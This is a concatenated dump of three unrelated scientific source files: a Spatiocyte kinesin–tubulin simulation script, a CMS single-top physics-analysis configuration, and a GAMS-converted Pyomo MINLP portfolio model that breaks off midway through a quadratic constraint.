r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','1']]
r.SearchVacant = 1
r.k = 145
#-------------------------------------------------------------------------------
#KIF ratchet biased walk_-------------------------------------------------------
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:rat1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','0']] #If BindingSite[1]==TUB
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #option 1
r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','0']] #Elif BindingSite[1]==TUB_GTP
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #option 2
r.BindingSite = 1
r.k = 55
#r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:rat1')
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
#r.VariableReferenceList = [['_', 'Variable:/Soma:aTUB','1']]
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','0']] #If BindingSite[1]==TUB
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #option 1
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','0']] #Elif BindingSite[1]==TUB_GTP
#r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','1']] #option 2
#r.BindingSite = 1
#r.k = 55
r = sim.createEntity('SpatiocyteNextReactionProcess', 'Process:/Soma:rat2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']] #A
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']] #C
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','0']] #E
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF_ATP','1']] #D
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','0']] #H
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF_ATP','1']] #F
r.BindingSite = 1
r.k = 55
#-------------------------------------------------------------------------------
#KIF random walk between GTP and GDP tubulins-----------------------------------
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:w1')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.ForcedSequence = 1
r.p = 1
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:w2')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','1']]
r.ForcedSequence = 1
r.p = 1
r = sim.createEntity('DiffusionInfluencedReactionProcess', 'Process:/Soma:w3')
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP','-1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB','1']]
r.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF','1']]
r.ForcedSequence = 1
r.p = 1
#-------------------------------------------------------------------------------
#KIF normal diffusion-----------------------------------------------------------
d = sim.createEntity('DiffusionProcess', 'Process:/Soma:dKIF')
d.VariableReferenceList = [['_', 'Variable:/Soma:KIF']]
d.D = 0.5e-12
d = sim.createEntity('DiffusionProcess', 'Process:/Soma:dTUB_KIF')
d.VariableReferenceList = [['_', 'Variable:/Soma:TUB_KIF']]
d.VariableReferenceList = [['_', 'Variable:/Soma:aTUB', '1']]
d.D = 0.04e-12
d = sim.createEntity('DiffusionProcess', 'Process:/Soma:dTUB_GTP_KIF')
d.VariableReferenceList = [['_', 'Variable:/Soma:TUB_GTP_KIF']]
d.WalkReact = 1
d.D = 0.04e-12
#-------------------------------------------------------------------------------
run(T)
| [
"[email protected]"
] | |
774b67059eddcf1cedf719cb61af7c2ced0de7fa | 8ecf4930f9aa90c35e5199d117068b64a8d779dd | /TopQuarkAnalysis/SingleTop/test/crabs44/SingleTopMC_TTBarQ2upFall11_cfg.py | da0b2fabbd1a6100f2c5fce7261928493357cfcf | [] | no_license | fabozzi/ST_44 | 178bd0829b1aff9d299528ba8e85dc7b7e8dd216 | 0becb8866a7c758d515e70ba0b90c99f6556fef3 | refs/heads/master | 2021-01-20T23:27:07.398661 | 2014-04-14T15:12:32 | 2014-04-14T15:12:32 | 18,765,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,424 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("SingleTop")
ChannelName = "TTBarQ2up";
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True),
FailPath = cms.untracked.vstring('ProductNotFound','Type Mismatch')
)
process.MessageLogger.cerr.FwkReport.reportEvery = 1000
#from PhysicsTools.PatAlgos.tools.cmsswVersionTools import run36xOn35xInput
# conditions ------------------------------------------------------------------
print "test "
#process.load("Configuration.StandardSequences.MixingNoPileUp_cff")
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff") ### real data
#process.GlobalTag.globaltag = cms.string('START42_V17::All')
process.GlobalTag.globaltag = cms.string('START44_V13::All')
#from Configuration.PyReleaseValidation.autoCond import autoCond
#process.GlobalTag.globaltag = autoCond['startup']
process.load("TopQuarkAnalysis.SingleTop.SingleTopSequences_cff")
process.load("SelectionCuts_Skim_cff");################<----------
#From <<ysicsTools.PatAlgos.tools.cmsswVersionTools import *
#larlaun42xOn3yzMcInput(process)
#run36xOn35xInput(process)
# Get a list of good primary vertices, in 42x, these are DAF vertices
from PhysicsTools.SelectorUtils.pvSelector_cfi import pvSelector
process.goodOfflinePrimaryVertices = cms.EDFilter(
"PrimaryVertexObjectFilter",
filterParams = pvSelector.clone( minNdof = cms.double(4.0), maxZ = cms.double(24.0) ),
src=cms.InputTag('offlinePrimaryVertices')
)
# require physics declared
process.load('HLTrigger.special.hltPhysicsDeclared_cfi')
process.hltPhysicsDeclared.L1GtReadoutRecordTag = 'gtDigis'
#dummy output
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('dummy.root'),
outputCommands = cms.untracked.vstring(""),
)
#rocess.load("PhysicsTools.HepMCCandAlgos.flavorHistoryPaths_cfi")
#mytrigs=["HLT_Mu9"]
mytrigs=["*"]
from HLTrigger.HLTfilters.hltHighLevel_cfi import *
#if mytrigs is not None :
# process.hltSelection = hltHighLevel.clone(TriggerResultsTag = 'TriggerResults::HLT', HLTPaths = mytrigs)
# process.hltSelection.throw = False
#
# getattr(process,"pfNoElectron"+postfix)*process.kt6PFJets
# set the dB to the beamspot
process.patMuons.usePV = cms.bool(False)
process.patElectrons.usePV = cms.bool(False)
#inputJetCorrLabel = ('AK5PFchs', ['L1FastJet', 'L2Relative', 'L3Absolute'])
# Configure PAT to use PF2PAT instead of AOD sources
# this function will modify the PAT sequences. It is currently
# not possible to run PF2PAT+PAT and standart PAT at the same time
from PhysicsTools.PatAlgos.tools.pfTools import *
from PhysicsTools.PatAlgos.tools.trigTools import *
postfix = ""
#usePF2PAT(process,runPF2PAT=True, jetAlgo='AK5', runOnMC=True, postfix=postfix, jetCorrections = inputJetCorrLabel)
usePF2PAT(process,runPF2PAT=True, jetAlgo='AK5', runOnMC=True, postfix=postfix)
switchOnTriggerMatchEmbedding(process,triggerMatchers = ['PatJetTriggerMatchHLTIsoMuBTagIP','PatJetTriggerMatchHLTIsoEleBTagIP'])
process.pfPileUp.Enable = True
process.pfPileUp.checkClosestZVertex = cms.bool(False)
process.pfPileUp.Vertices = cms.InputTag('goodOfflinePrimaryVertices')
process.pfJets.doAreaFastjet = True
process.pfJets.doRhoFastjet = False
#process.pfJets.Rho_EtaMax = cms.double(4.4)
#Compute the mean pt per unit area (rho) from the
#PFchs inputs
from RecoJets.JetProducers.kt4PFJets_cfi import kt4PFJets
process.kt6PFJets = kt4PFJets.clone(
rParam = cms.double(0.6),
src = cms.InputTag('pfNoElectron'+postfix),
doAreaFastjet = cms.bool(True),
doRhoFastjet = cms.bool(True),
# voronoiRfact = cms.double(0.9),
# Rho_EtaMax = cms.double(4.4)
)
process.patJetCorrFactors.rho = cms.InputTag("kt6PFJets", "rho")
coneOpening = cms.double(0.4)
defaultIsolationCut = cms.double(0.2)
#coneOpening = process.coneOpening
#defaultIsolationCut = process.coneOpening
#Muons
#applyPostfix(process,"isoValMuonWithNeutral",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValMuonWithCharged",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValMuonWithPhotons",postfix).deposits[0].deltaR = coneOpening
#electrons
#applyPostfix(process,"isoValElectronWithNeutral",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValElectronWithCharged",postfix).deposits[0].deltaR = coneOpening
#applyPostfix(process,"isoValElectronWithPhotons",postfix).deposits[0].deltaR = coneOpening
applyPostfix(process,"pfIsolatedMuons",postfix).combinedIsolationCut = defaultIsolationCut
applyPostfix(process,"pfIsolatedElectrons",postfix).combinedIsolationCut = defaultIsolationCut
#applyPostfix(process,"pfIsolatedMuons",postfix).combinedIsolationCut = cms.double(0.125)
#applyPostfix(process,"pfIsolatedElectrons",postfix).combinedIsolationCut = cms.double(0.125)
#postfixQCD = "ZeroIso"
# Add the PV selector and KT6 producer to the sequence
getattr(process,"patPF2PATSequence"+postfix).replace(
getattr(process,"pfNoElectron"+postfix),
getattr(process,"pfNoElectron"+postfix)*process.kt6PFJets )
#Residuals (Data)
#process.patPFJetMETtype1p2Corr.jetCorrLabel = 'L2L3Residual'
process.patseq = cms.Sequence(
# process.patElectronIDs +
process.goodOfflinePrimaryVertices *
process.patElectronIDs *
getattr(process,"patPF2PATSequence"+postfix) #*
# process.producePatPFMETCorrections
# getattr(process,"patPF2PATSequence"+postfixQCD)
)
process.pfIsolatedMuonsZeroIso = process.pfIsolatedMuons.clone(combinedIsolationCut = cms.double(float("inf")))
process.patMuonsZeroIso = process.patMuons.clone(pfMuonSource = cms.InputTag("pfIsolatedMuonsZeroIso"), genParticleMatch = cms.InputTag("muonMatchZeroIso"))
# use pf isolation, but do not change matching
tmp = process.muonMatch.src
adaptPFMuons(process, process.patMuonsZeroIso, "")
process.muonMatch.src = tmp
process.muonMatchZeroIso = process.muonMatch.clone(src = cms.InputTag("pfIsolatedMuonsZeroIso"))
process.pfIsolatedElectronsZeroIso = process.pfIsolatedElectrons.clone(combinedIsolationCut = cms.double(float("inf")))
process.patElectronsZeroIso = process.patElectrons.clone(pfElectronSource = cms.InputTag("pfIsolatedElectronsZeroIso"))
#####################
#Adaptpfelectrons (process, process.patElectronsZeroIso, "")
#Add the PF type 1 corrections to MET
#process.load("PhysicsTools.PatUtils.patPFMETCorrections_cff")
#process.selectedPatJetsForMETtype1p2Corr.src = cms.InputTag('selectedPatJets')
#process.selectedPatJetsForMETtype2Corr.src = cms.InputTag('selectedPatJets')
#process.patPFJetMETtype1p2Corr.type1JetPtThreshold = cms.double(10.0)
#process.patPFJetMETtype1p2Corr.skipEM = cms.bool(False)
#process.patPFJetMETtype1p2Corr.skipMuons = cms.bool(False)
#process.patPF2PATSequence.remove(process.patPF2PATSequence.FastjetJetProducer)
process.pathPreselection = cms.Path(
process.patseq #+ process.producePatPFMETCorrections
)
process.ZeroIsoLeptonSequence = cms.Path(
process.pfIsolatedMuonsZeroIso +
process.muonMatchZeroIso +
process.patMuonsZeroIso +
process.pfIsolatedElectronsZeroIso +
process.patElectronsZeroIso
)
#process.looseLeptonSequence.remove(process.muonMatchLoose)
#getattr(process,"pfNoPileUp"+postfix).enable = True
#getattr(process,"pfNoMuon"+postfix).enable = True
#getattr(process,"pfNoElectron"+postfix).enable = True
#getattr(process,"pfNoTau"+postfix).enable = False
#Getattr (process,"pfNoJet"+postfix).enable = True
process.pfNoTau.enable = False
#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1000) )
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source ("PoolSource",
fileNames = cms.untracked.vstring (
#'file:/tmp/oiorio/F81B1889-AF4B-DF11-85D3-001A64789DF4.root'
#'file:/tmp/oiorio/EC0EE286-FA55-E011-B99B-003048F024F6.root'
#'file:/tmp/oiorio/D0B32FD9-6D87-E011-8572-003048678098.root'
#'file:/tmp/oiorio/149E3017-B799-E011-9FA9-003048F118C2.root'
#'file:/tmp/oiorio/FE4EF257-A3AB-E011-9698-00304867915A.root',
#'file:/tmp/oiorio/50A31B1A-8AAB-E011-835B-0026189438F5.root'
#'file:/tmp/oiorio/TTJetsLocalFall11.root',
#'file:/tmp/oiorio/',
#'file:/tmp/oiorio/00012F91-72E5-DF11-A763-00261834B5F1.root',
#'/store/mc/Fall11/T_TuneZ2_t-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/CA7C6394-CE32-E111-9125-003048FFD796.root'
#'/store/mc/Fall11/Tbar_TuneZ2_t-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/B81B1A7D-6E2A-E111-A1C1-0018F3D096EC.root'
#'/store/mc/Fall11/T_TuneZ2_t-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/DE6B0050-3133-E111-B437-003048FFD736.root'
#'/store/mc/Fall11/T_TuneZ2_s-channel_7TeV-powheg-tauola/AODSIM/PU_S6_START44_V9B-v1/0000/440369A6-A23C-E111-9B5B-E0CB4E19F9AF.root'
#'file:/afs/cern.ch/work/m/mmerola/FC1035C0-2E32-E111-86D1-001A92971BD6_tchannelFall11_44X.root'
),
#eventsToProcess = cms.untracked.VEventRange('1:2807840-1:2807840'),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck')
)
#process.TFileService = cms.Service("TFileService", fileName = cms.string("/tmp/oiorio/"+ChannelName+"_pt_bmode.root"))
process.TFileService = cms.Service("TFileService", fileName = cms.string("pileupdistr_"+ChannelName+".root"))
process.pileUpDumper = cms.EDAnalyzer("SingleTopPileUpDumper",
channel = cms.string(ChannelName),
)
#process.WLightFilter = process.flavorHistoryFilter.clone(pathToSelect = cms.int32(11))
#process.WccFlter = process.flavorHistoryFilter.clone(pathToSelect = cms.int32(6))
#process.WbbFilter = process.flavorHistoryFilter.clone(pathToSelect = cms.int32(5))
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI38X")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI37X")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","REDIGI311X")
#process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","HLT")
process.hltFilter.TriggerResultsTag = cms.InputTag("TriggerResults","","HLT")
process.hltFilter.HLTPaths = mytrigs
process.countLeptons.doQCD = cms.untracked.bool(False)
process.baseLeptonSequence = cms.Path(
# process.pileUpDumper +
process.basePath
)
process.selection = cms.Path (
process.preselection +
process.nTuplesSkim
)
from TopQuarkAnalysis.SingleTop.SingleTopNtuplizers_cff import saveNTuplesSkimLoose
from TopQuarkAnalysis.SingleTop.SingleTopNtuplizers_cff import saveNTuplesSkimMu
savePatTupleSkimLoose = cms.untracked.vstring(
'drop *',
'keep patMuons_selectedPatMuons_*_*',
'keep patElectrons_selectedPatElectrons_*_*',
'keep patJets_selectedPatJets_*_*',
'keep patMETs_patMETs_*_*',
'keep *_patPFMet_*_*',
'keep *_patType1CorrectedPFMet_*_*',
'keep *_PVFilterProducer_*_*',
'keep patJets_selectedPatJetsTriggerMatch_*_*',
"keep *_TriggerResults_*_*",#Trigger results
"keep *_PatJetTriggerMatchHLTIsoMuBTagIP_*_*",#Trigger matches
"keep *_patTrigger_*_*",
"keep *_patTriggerEvent_*_*",
'keep *_pfJets_*_*',
'keep patJets_topJetsPF_*_*',
'keep patMuons_looseMuons_*_*',
'keep patElectrons_looseElectrons_*_*',
'keep patMuons_tightMuons_*_*',
'keep patElectrons_tightElectrons_*_*',
'keep *_PDFInfo_*_*',
'keep *_patElectronsZeroIso_*_*',
'keep *_patMuonsZeroIso_*_*',
'keep *_PVFilterProducer_*_*',
'keep *_cFlavorHistoryProducer_*_*',
'keep *_bFlavorHistoryProducer_*_*',
)
## Output module configuration
process.singleTopNTuple = cms.OutputModule("PoolOutputModule",
# fileName = cms.untracked.string('rfio:/CST/cern.ch/user/o/oiorio/SingleTop/SubSkims/WControlSamples1.root'),
# fileName = cms.untracked.Bstring('/tmp/oiorio/edmntuple_tchannel_big.root'),
# fileName = cms.untracked.string('/tmp/oiorio/edmntuple_'+ChannelName+'.root'),
fileName = cms.untracked.string('edmntuple_'+ChannelName+'.root'),
SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring('selection')),
outputCommands = saveNTuplesSkimLoose,
)
process.singleTopPatTuple = cms.OutputModule("PoolOutputModule",
# fileName = cms.untracked.string('rfio:/CST/cern.ch/user/o/oiorio/SingleTop/SubSkims/WControlSamples1.root'),
fileName = cms.untracked.string('pattuple_'+ChannelName+'.root'),
SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring('selection')),
outputCommands = savePatTupleSkimLoose
)
process.singleTopNTuple.dropMetaData = cms.untracked.string("ALL")
process.outpath = cms.EndPath(
process.singleTopNTuple #+
# process.singleTopPatTuple
)
| [
"[email protected]"
] | |
90bb35f751c04a00431dcc41c19d92be007cb65d | 731a33f8bb92bad31ab233416d8ef6eb3a9f3fe0 | /minlplib_instances/smallinvSNPr2b020-022.py | 8348bb9863905664e9dffb15877a5b89b31156af | [] | no_license | ChristophNeumann/IPCP | d34c7ec3730a5d0dcf3ec14f023d4b90536c1e31 | 6e3d14cc9ed43f3c4f6c070ebbce21da5a059cb7 | refs/heads/main | 2023-02-22T09:54:39.412086 | 2021-01-27T17:30:50 | 2021-01-27T17:30:50 | 319,694,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167,363 | py | # MINLP written by GAMS Convert at 02/15/18 11:44:29
#
# Equation counts
# Total E G L N X C B
# 4 0 2 2 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 101 1 0 100 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 401 301 100 0
from pyomo.environ import *
model = m = ConcreteModel()
m.i1 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i2 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i3 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i4 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i5 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i6 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i7 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i8 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i9 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i10 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i11 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i12 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i13 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i14 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i15 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i16 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i17 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i18 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i19 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i20 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i21 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i22 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i23 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i24 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i25 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i26 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i27 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i28 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i29 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i30 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i31 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i32 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i33 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i34 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i35 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i36 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i37 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i38 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i39 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i40 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i41 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i42 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i43 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i44 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i45 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i46 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i47 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i48 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i49 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i50 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i51 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i52 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i53 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i54 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i55 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i56 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i57 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i58 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i59 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i60 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i61 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i62 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i63 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i64 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i65 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i66 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i67 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i68 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i69 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i70 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i71 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i72 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i73 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i74 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i75 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i76 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i77 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i78 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i79 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i80 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i81 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i82 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i83 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i84 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i85 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i86 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i87 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i88 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i89 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i90 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i91 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i92 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i93 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i94 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i95 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i96 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i97 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i98 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i99 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i100 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.x101 = Var(within=Reals,bounds=(None,None),initialize=0)
m.obj = Objective(expr=m.x101, sense=minimize)
m.c1 = Constraint(expr=0.00841507*m.i1**2 + 0.0222536*m.i2**2 + 0.0056479*m.i3**2 + 0.00333322*m.i4**2 + 0.00490963*m.i5
**2 + 0.0221034*m.i6**2 + 0.00509899*m.i7**2 + 0.049464*m.i8**2 + 0.0171508*m.i9**2 + 0.0064643*
m.i10**2 + 0.0218437*m.i11**2 + 0.00346366*m.i12**2 + 0.0458502*m.i13**2 + 0.0747061*m.i14**2 +
0.0196511*m.i15**2 + 0.014222*m.i16**2 + 0.0147535*m.i17**2 + 0.00398615*m.i18**2 + 0.00644484*
m.i19**2 + 0.0322232*m.i20**2 + 0.00887889*m.i21**2 + 0.0434025*m.i22**2 + 0.00981376*m.i23**2 +
0.0133193*m.i24**2 + 0.00471036*m.i25**2 + 0.00359843*m.i26**2 + 0.0112312*m.i27**2 + 0.00476479*
m.i28**2 + 0.00356255*m.i29**2 + 0.0730121*m.i30**2 + 0.00785721*m.i31**2 + 0.0243787*m.i32**2 +
0.0171188*m.i33**2 + 0.00439547*m.i34**2 + 0.00502594*m.i35**2 + 0.0580619*m.i36**2 + 0.0135984*
m.i37**2 + 0.00254137*m.i38**2 + 0.0153341*m.i39**2 + 0.109758*m.i40**2 + 0.0346065*m.i41**2 +
0.0127589*m.i42**2 + 0.011147*m.i43**2 + 0.0156318*m.i44**2 + 0.00556588*m.i45**2 + 0.00302864*
m.i46**2 + 0.0214898*m.i47**2 + 0.00499587*m.i48**2 + 0.00864393*m.i49**2 + 0.0228248*m.i50**2 +
0.0077726*m.i51**2 + 0.00992767*m.i52**2 + 0.0184506*m.i53**2 + 0.0113481*m.i54**2 + 0.0067583*
m.i55**2 + 0.0150416*m.i56**2 + 0.00324193*m.i57**2 + 0.00478196*m.i58**2 + 0.0132471*m.i59**2 +
0.00273446*m.i60**2 + 0.0282459*m.i61**2 + 0.0230221*m.i62**2 + 0.0240972*m.i63**2 + 0.00829946*
m.i64**2 + 0.00688665*m.i65**2 + 0.00858803*m.i66**2 + 0.00778038*m.i67**2 + 0.0082583*m.i68**2
+ 0.022885*m.i69**2 + 0.00568332*m.i70**2 + 0.0234021*m.i71**2 + 0.00924249*m.i72**2 +
0.00669675*m.i73**2 + 0.0109501*m.i74**2 + 0.00663385*m.i75**2 + 0.00328058*m.i76**2 + 0.0112814*
m.i77**2 + 0.00341076*m.i78**2 + 0.0400653*m.i79**2 + 0.00876827*m.i80**2 + 0.0138276*m.i81**2 +
0.00246987*m.i82**2 + 0.0406516*m.i83**2 + 0.00947194*m.i84**2 + 0.00647449*m.i85**2 + 0.0107715*
m.i86**2 + 0.00803069*m.i87**2 + 0.106502*m.i88**2 + 0.00815263*m.i89**2 + 0.0171707*m.i90**2 +
0.0163522*m.i91**2 + 0.00911726*m.i92**2 + 0.00287317*m.i93**2 + 0.00360309*m.i94**2 + 0.00699161
*m.i95**2 + 0.0340959*m.i96**2 + 0.00958446*m.i97**2 + 0.0147951*m.i98**2 + 0.0177595*m.i99**2 +
0.0208523*m.i100**2 + 0.00692522*m.i1*m.i2 + 0.00066464*m.i1*m.i3 + 0.00388744*m.i1*m.i4 +
0.001108218*m.i1*m.i5 + 0.0046712*m.i1*m.i6 + 0.00771824*m.i1*m.i7 + 0.0020653*m.i1*m.i8 +
0.001524626*m.i1*m.i9 + 0.00484724*m.i1*m.i10 + 0.00733242*m.i1*m.i11 + 0.00556218*m.i1*m.i12 +
0.0052571*m.i1*m.i13 + 0.0218926*m.i1*m.i14 + 0.01352862*m.i1*m.i15 + 0.00549784*m.i1*m.i16 +
0.00235342*m.i1*m.i17 + 0.00448206*m.i1*m.i18 + 0.0072148*m.i1*m.i19 + 0.00958894*m.i1*m.i20 +
0.00376328*m.i1*m.i21 + 0.0117501*m.i1*m.i22 + 0.00575998*m.i1*m.i23 - 0.000109147*m.i1*m.i24 +
0.000604944*m.i1*m.i25 + 0.00473296*m.i1*m.i26 + 0.000356572*m.i1*m.i27 - 0.001552262*m.i1*m.i28
